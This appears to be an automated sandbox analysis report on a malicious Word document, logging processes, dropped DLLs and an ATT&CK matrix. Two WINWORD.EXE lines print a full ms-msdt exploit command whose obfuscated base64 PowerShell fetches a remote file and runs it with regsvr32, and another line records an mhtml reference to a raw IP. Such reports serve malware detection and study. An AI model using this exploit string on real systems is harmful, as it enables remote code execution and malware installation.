        Source: unknownProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\xwo13jpt\xwo13jpt.cmdline
        Source: unknownProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ddzr0cba\ddzr0cba.cmdline

        Persistence and Installation Behavior

        barindex
        Contains an external reference to another file
        Source: document.xml.relsExtracted files from sample: mhtml:http://45.32.185.177:80/123.res!http://45.32.185.177:80/123.res
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeFile created: C:\Users\user\AppData\Local\Temp\ddzr0cba\ddzr0cba.dllJump to dropped file
        Source: C:\Windows\SysWOW64\msdt.exeFile created: C:\Windows\Temp\SDIAG_466c2050-93b8-4fd4-9932-b9db6d401695\DiagPackage.dllJump to dropped file
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeFile created: C:\Users\user\AppData\Local\Temp\xwo13jpt\xwo13jpt.dllJump to dropped file
        Source: C:\Windows\SysWOW64\msdt.exeFile created: C:\Windows\Temp\SDIAG_466c2050-93b8-4fd4-9932-b9db6d401695\en-US\DiagPackage.dll.muiJump to dropped file
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeFile created: C:\Users\user\AppData\Local\Temp\qe5jzpda\qe5jzpda.dllJump to dropped file
        Source: C:\Windows\SysWOW64\msdt.exeFile created: C:\Windows\Temp\SDIAG_466c2050-93b8-4fd4-9932-b9db6d401695\DiagPackage.dllJump to dropped file
        Source: C:\Windows\SysWOW64\msdt.exeFile created: C:\Windows\Temp\SDIAG_466c2050-93b8-4fd4-9932-b9db6d401695\en-US\DiagPackage.dll.muiJump to dropped file
        Source: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXERegistry key monitored for changes: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\ExplorerJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\msdt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\msdt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\msdt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\msdt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\msdt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\msdt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\regsvr32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\msdt.exeWindow / User API: threadDelayed 1632Jump to behavior
        Source: C:\Windows\SysWOW64\msdt.exeWindow / User API: threadDelayed 665Jump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\ddzr0cba\ddzr0cba.dllJump to dropped file
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\xwo13jpt\xwo13jpt.dllJump to dropped file
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\qe5jzpda\qe5jzpda.dllJump to dropped file
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess created: C:\Windows\SysWOW64\msdt.exe C:\Windows\system32\msdt.exe" ms-msdt:/id PCWDiagnostic /skip force /param "IT_RebrowseForFile=? IT_LaunchMethod=ContextMenu IT_BrowseForFile=$(Invoke-Expression($(Invoke-Expression('[System.Text.Encoding]'+[char]58+[char]58+'Unicode.GetString([System.Convert]'+[char]58+[char]58+'FromBase64String('+[char]34+'JABwACAAPQAgACQARQBuAHYAOgB0AGUAbQBwADsAaQB3AHIAIABoAHQAdABwAHMAOgAvAC8AYQBsAHMALQBvAG4AbABpAG4AZQAuAG8AcgBnAC8ASgBRAFcAagA3ADgALwBZAC4AcABuAGcAIAAtAE8AdQB0AEYAaQBsAGUAIAAkAHAAXABGAHIAbwBzAC4AcABvAHMAdABlAHIAOwByAGUAZwBzAHYAcgAzADIAIAAkAHAAXABGAHIAbwBzAC4AcABvAHMAdABlAHIA'+[char]34+'))'))))i/../../../../../../../../../../../../../../Windows/System32/mpsigstub.exe
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess created: C:\Windows\SysWOW64\msdt.exe C:\Windows\system32\msdt.exe" ms-msdt:/id PCWDiagnostic /skip force /param "IT_RebrowseForFile=? IT_LaunchMethod=ContextMenu IT_BrowseForFile=$(Invoke-Expression($(Invoke-Expression('[System.Text.Encoding]'+[char]58+[char]58+'Unicode.GetString([System.Convert]'+[char]58+[char]58+'FromBase64String('+[char]34+'JABwACAAPQAgACQARQBuAHYAOgB0AGUAbQBwADsAaQB3AHIAIABoAHQAdABwAHMAOgAvAC8AYQBsAHMALQBvAG4AbABpAG4AZQAuAG8AcgBnAC8ASgBRAFcAagA3ADgALwBZAC4AcABuAGcAIAAtAE8AdQB0AEYAaQBsAGUAIAAkAHAAXABGAHIAbwBzAC4AcABvAHMAdABlAHIAOwByAGUAZwBzAHYAcgAzADIAIAAkAHAAXABGAHIAbwBzAC4AcABvAHMAdABlAHIA'+[char]34+'))'))))i/../../../../../../../../../../../../../../Windows/System32/mpsigstub.exeJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES374A.tmp" "c:\Users\user\AppData\Local\Temp\qe5jzpda\CSC4563D2ED18334995B732DDC516AA1E81.TMP"Jump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES4C97.tmp" "c:\Users\user\AppData\Local\Temp\xwo13jpt\CSC9D13466D68BE46EAAB5DAAD8B4EDFE4C.TMP"Jump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESB3CD.tmp" "c:\Users\user\AppData\Local\Temp\ddzr0cba\CSC44E4BCADDF3245FBA3B96135AF703040.TMP"Jump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXEQueries volume information: C:\Users\user\AppData\Local\Microsoft\Office\16.0\OfficeFileCache\CentralTable.accdb VolumeInformationJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXEQueries volume information: C:\Users\user\AppData\Local\Microsoft\Office\16.0\OfficeFileCache\CentralTable.laccdb VolumeInformationJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXEQueries volume information: C:\Users\user\AppData\Local\Microsoft\Office\16.0\OfficeFileCache\CentralTable.laccdb VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\msdt.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00116~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\msdt.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

        Mitre Att&ck Matrix

        Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
        Valid Accounts1
        Command and Scripting Interpreter        		1
        DLL Side-Loading        		11
        Process Injection        		11
        Masquerading        		OS Credential Dumping1
        Query Registry        		Remote ServicesData from Local SystemExfiltration Over Other Network Medium1
        Ingress Tool Transfer        		Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
        Default Accounts12
        Exploitation for Client Execution        		Boot or Logon Initialization Scripts1
        DLL Side-Loading        		11
        Process Injection        		LSASS Memory1
        Application Window Discovery        		Remote Desktop ProtocolData from Removable MediaExfiltration Over Bluetooth1
        Non-Application Layer Protocol        		Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
        Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)1
        DLL Side-Loading        		Security Account Manager1
